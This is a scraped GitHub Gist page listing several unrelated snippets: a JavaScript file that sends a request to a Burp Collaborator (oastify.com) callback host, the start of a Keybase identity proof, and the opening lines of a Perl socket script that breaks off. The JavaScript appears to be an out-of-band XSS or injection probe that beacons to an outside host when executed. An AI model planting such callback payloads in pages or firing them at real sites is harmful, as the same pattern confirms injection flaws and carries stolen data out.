Skip to content

Instantly share code, notes, and snippets.

@zadyree
zadyree / s.js
Last active October 13, 2023 17:50
var temoin = "OK";
x = new XMLHttpRequest;
x.open("GET","https://b8kva5ums9m4v9rjgzpuebu9i0orcn0c.oastify.com/?message=" + temoin);
x.send();

Keybase proof

I hereby claim:

  • I am zadyree on github.
  • I am zadyree (https://keybase.io/zadyree) on keybase.
  • I have a public key whose fingerprint is D980 9E1D A0AF 3765 0BA1 1281 D0D4 467F D2F9 F1D7

To claim this, I am signing this object:

#!/usr/bin/perl
use strict;
use warnings;
use 5.010;
use IO::Socket::INET;
$| = 1;
my ($in, $r);